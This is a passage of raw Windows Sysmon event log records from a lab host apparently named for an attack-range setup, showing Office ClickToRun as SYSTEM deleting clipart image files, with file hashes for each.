Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105250.WMFMD5=93CEBE7AF61FB4FE512C43B281B2FB4E,SHA256=395DB4696C5C287979BC9E0CC3FAFEB2ECC20E93F5E8479F01B7BA8D618A2705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105246.WMFMD5=A0DE85AD71B087B75E7D593ED1CFAD72,SHA256=4C842A41C85FE36C3DDCED2EC3CC1A7C49B8A37CED1A438E8638F72A28D22858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105244.WMFMD5=AB02F354DBFC959044A53A3D7C755025,SHA256=95CBDDDCB6AB52F877E34C65879F2C3D619250000CCAA7BA77FB732A43FEB8FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105240.WMFMD5=E444FE3C8C28B819318BB6554B7D4F15,SHA256=51DDA91D6F32A2A35D1354B0AD197F626812ABE2B6F2C3758403CC3DF762B75C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105238.WMFMD5=AEA4E94E04CE4943D6838A5CEB2EA2EB,SHA256=C03C2671ECD5BC0F60DFA9E3227BDD08D6FBA8E61E60A287FF93806769BBFC7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105234.WMFMD5=D203788E263CFCF8680A7BBCAC861D3F,SHA256=FF2F06F3C9AC0887828D382F9C28044D6DA782B86EE4CFCB5EC3AEA69BF1BC07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105232.WMFMD5=1E833C4B45A26D3D8A83C99676BCF7ED,SHA256=31E67B41D147234192069BBF039D824284097E31871BCB81A29E9899AA9697A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105230.WMFMD5=D2204742E7BC7879DF1508D2DCA1CF78,SHA256=C89804FDD62A2008515EFBD34D3F2C59C46C2B6C9090D97B88DDE0ECF18AB4DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0103850.WMFMD5=0DDD8B7D8E495990878699E670AE0980,SHA256=C6756530608B84B31559B966A4A5A272C51494BA149A1C69742D990475A761BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0103812.WMFMD5=D76616113168AA6B118CD9DE2263C766,SHA256=4FA9F6C33FE41B236E68FC35D5D7952F42A9796FB3C420699D8D84A311A2A514,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0103402.WMFMD5=56DE5E80F8B295189B17397554133543,SHA256=B1710AA27FE6CE1703F35036A0F840CBE5885A60A814E64D69F399CDC1164C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0103262.WMFMD5=2B8120EC67CEA5278DB1D0F559F7F168,SHA256=EF4B4F54D046B537B60278870BC386869007D76F39D03DA527CFFFDBE389243F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0103058.WMFMD5=C98B1CD4D0D59608207B55CFC3568902,SHA256=63C6F73F890B8A5C9150169AC4BCE78F6F0DB848895E05309DDA76CBB083123A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0102984.WMFMD5=4042321CBE21358A171449C480B56501,SHA256=BF9507C52550D48D6333CA629A0466555DEE48E9ACD6DA668A5E101417A481D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0102762.WMFMD5=E0147252856208E667A0E88CD5D78F6C,SHA256=FA7E0DA3ACED4D60D8DFBC5459231854AC4F037FD885B2EED7511D31D6F462F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0102594.WMFMD5=FD56FFD58A93EC30F8C91A21A9F7EB95,SHA256=942C66DA24895505391FB86E0D591F22AFF2D60367AE8AFD0563925639940C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0102002.WMFMD5=F7D5C3F699C613C725689DCBF863A773,SHA256=F9149AC580C60508F11AB86C396FFD067F21CEF2DE47BF45C7AB13B244619618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101980.WMFMD5=21AB736FD3A8980E9AC3289CECABB3CD,SHA256=6ECDD5CB9C315169C087429CDFAC442BDFEE8431F26C3A1F7585C3C4D4E60AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101867.BMPMD5=5969BB97758418BC85337E8813A25790,SHA256=9407C653E6574D60859AA595DF06CBA4A252BB3F256293B9D5C038F3E6E86D18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101866.BMPMD5=ADE36BE922177A374E6F9C0B3796C03A,SHA256=5F839B9FAC49331D3F7007392C3C30ACF90D9E546BB960F4E8F8F39D80D248E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101865.BMPMD5=478E7ACFE54D464D33913452FDA8100A,SHA256=EAF744F6E89141D1CA6215BBD46265DBB0A904E78165FE373A1C2B979C26A76C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101864.BMPMD5=967C5ACB8C48860BB927BBC3D59D4BF4,SHA256=1A22FC2BD37BBE4344CC99428D9095E111C70328621036894620EF516B033F27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101863.BMPMD5=906029909273F696C5AE274C1910654F,SHA256=CF5FE1B9631B6CDE174C57B4A2D9F8E7922916CCED95DA336B1B37B716CABA7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101862.BMPMD5=391DE3BF5FF50FE8BE74E9D5869256D7,SHA256=43836A8E069E998A2963AEB70A9E791798BE3C84F28F97B2CB09977C5C1D7F14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101861.BMPMD5=78990098B71358C48929D92ED0A1218D,SHA256=616CEF9B2B2C82C4D7E20FD8A495BEC6C259072DBB9F845CEF41693043B5387F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101860.BMPMD5=74737E6E2DBD946231CA66A171A793D1,SHA256=6C2671EF15A2F31695B858D2E634C2F1A6BFEB6673A187D2C1498EFEA52FEDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101859.BMPMD5=65148E78C17B18569CD15DE69C9E60F2,SHA256=286E6978143774E81A2DB46C945FCBD9CA548DB9F8108A7D35D412AEAD8FE8CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101858.BMPMD5=72EC91EE27347B9B4D93DC0AF16D54B8,SHA256=AE217780686EA47991C7301D37450A2D6D9C45D1012D605A298EA78300DE91E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101857.BMPMD5=974953D10663B442D766E90CE8D8CAFA,SHA256=2E77E2F1888BEC48B77BBCE80259A1CF4C5789840835FB57555ACE2C77098FEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0101856.BMPMD5=C9C4D3013A30D8A44B990664BEF89821,SHA256=49EB09953AA29B7DFF1E3B466B31B68DFF84532ED66143450C51CAF2104A5530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099205.WMFMD5=89ED7F99A2CB9B2F812ECE8886096D13,SHA256=72742EDA22BABBC079E9AD07511D8BA3FC0D215D6948A01A1850C38169F80021,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099204.WMFMD5=162392D7724094C46CB5D29CE47B2A3F,SHA256=0337709628225CAC2E9F10EFC2CDD796A79BE6F075756158D86383C34A978526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099203.GIFMD5=42B8BB781EB1DCC9191EC1C95FA8B454,SHA256=08B2AF562C2527C78E04978F1452AF871D19A9A7E28DD5978654E9733F68DE23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099202.GIFMD5=1D54B7277F9856AFEA89547A5065B96D,SHA256=8AFB7FCC4E788DBDE3494FF4E1343ACA018283105569BD6A8F0459E2118C89DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099201.GIFMD5=AF05D4D4911B97D358EA8DACD0A32BC9,SHA256=B119040094E00C99C34166C22963A6E6CBC010B2D517BE935FF779C0E0B03110,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099200.GIFMD5=5F397786C72AF73BB07993B1814D56FD,SHA256=A808FE7009EAEAAC800FBF8BBAD568A9C5EA3D25D9775981171DA3663C1BC2C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099199.GIFMD5=CCB6733B2B37BF04B8B49553C447346E,SHA256=4E8AFF691777B10CA1433F867002FEFC677CF3016CBD3498F437AF71104B2E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099198.GIFMD5=DEE57689F8FA76BD1688A67ECA26485B,SHA256=B8635A1EBD59E71C0D3B88A972AD07D4646CAC8025730D4D5E7F125CE625A264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099197.GIFMD5=5A2C5F32985171CE1F5B5068B9044F03,SHA256=E6EFDA472AF8678BBCA3AA272650AE1DA89AFF148521B05D73EF1AAE5D6D0384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099196.GIFMD5=AB2F28FA554F60A685B46980470290CE,SHA256=F7B354D26F093FF4E32A5A41BBFE36E855BAD2C925AEECCC3DE30EBC1599E993,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099195.GIFMD5=A882B3860978598A64502FD5E4167D22,SHA256=FBC7BC1F87E4EB95D49337B55AD61B1FA60B3C431C6B564AAABC5DBD0ACDF667,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099194.GIFMD5=A3E75EC499FC10BB64F31AB67EFBD103,SHA256=0A58E226AF4738303DE7335343DD3882E65F720A95548429E26F208B62E0ED73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099193.GIFMD5=F5E8E2020CD6315EC03C45D1A93A2FE3,SHA256=49E82B2521CEDE2041A681929F7EC4004FF15246627C0ED2EAED4B767E9AE1CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099192.GIFMD5=3C31ABC4D2FE5B18827F6EFCCE82A1EF,SHA256=1395BADEF1FAA1DBFD44972A6BCBF63A6089F1645E314BAB7A525FC425AE710C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099191.JPGMD5=C98BCA175E1767127C37906DA018863D,SHA256=F59540FBC069F1D7A35470E94C68BB71E294D9293B4DBC9A05DA70A4D762325A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 